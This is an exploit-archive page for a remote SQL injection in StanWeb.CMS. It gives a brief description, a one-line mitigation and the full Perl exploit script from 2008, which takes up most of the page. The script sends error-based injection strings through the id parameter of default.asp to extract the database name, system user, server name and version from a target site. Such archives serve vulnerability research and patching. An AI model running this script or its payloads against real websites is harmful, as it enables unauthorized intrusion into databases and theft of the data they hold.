header-logo
Suggest Exploit
vendor:
StanWeb.CMS
by:
JosS
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: StanWeb.CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

StanWeb.CMS (default.asp id) Remote SQL Injection Exploit

StanWeb.CMS is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable web application. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
# --==+               StanWeb.CMS (default.asp id) Remote SQL Injection Exploit            +==--
# --==+====================================================================================+==--
#                      [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

# [+] Info:

# [~] Software: StanWeb.CMS
# [~] Exploit: Remote SQL Injection [High]
# [~] Bug Found By: JosS
# [~] Contact: sys-project[at]hotmail.com
# [~] Web: http://www.spanish-hackers.com
# [~] Vuln File: default.asp

# [+] Exploit:

#!/usr/bin/perl

# StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / EspSeC
# www.spanish-hackers.com

# in memory of rgod :D

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
		   $linux="0";
	    }else{
		    $linux="1";
	    }
		if($linux){
system("clear");
}
else{
system("cls");
system ("title StanWeb.CMS (default.asp id) Remote SQL Injection Exploit");
system ("color 02");
}

}

#*************************** expl ******************************


&lw;

print "\t\t########################################################\n\n";
print "\t\t#       StanWeb.CMS - Remote SQL Injection Exploit     #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";


$host=$ARGV[0];
chop $host;
$host=$host."/default.asp?id=";

if(!$ARGV[0]) {
    print "\n[x] StanWeb.CMS - Remote SQL Injection Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl $0 [host]\n";
    print "[x] example: http://hostxx.com/web\n";
    exit(1);
 }

@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--');


for ($i=0;$i<=3;$i++)

{

my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;

if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
{

if ($comando[$i] eq "1+and+1=convert(int,db_name())")
{

print "db_name:\n";

$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$dbname\n\n";

}

if ($comando[$i] eq "1+and+1=convert(int,system_user)")

{

print "system_user:\n";

$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$systemuser\n\n";

}

if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")

{

print "servername:\n";

$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$servername\n\n";

}

if ($comando[$i] eq '1+and+1=convert(int,@@version)--')

{

print "version:\n";

$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
print "$version\n\n";

}

} # Cierre del if principal
} # cierre for


# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
# --==+                                       JosS                                         +==--
# --==+====================================================================================+==--
#                                        [+] [The End]

# milw0rm.com [2008-05-16]

Navigation

Suggest Exploit

Services By CQR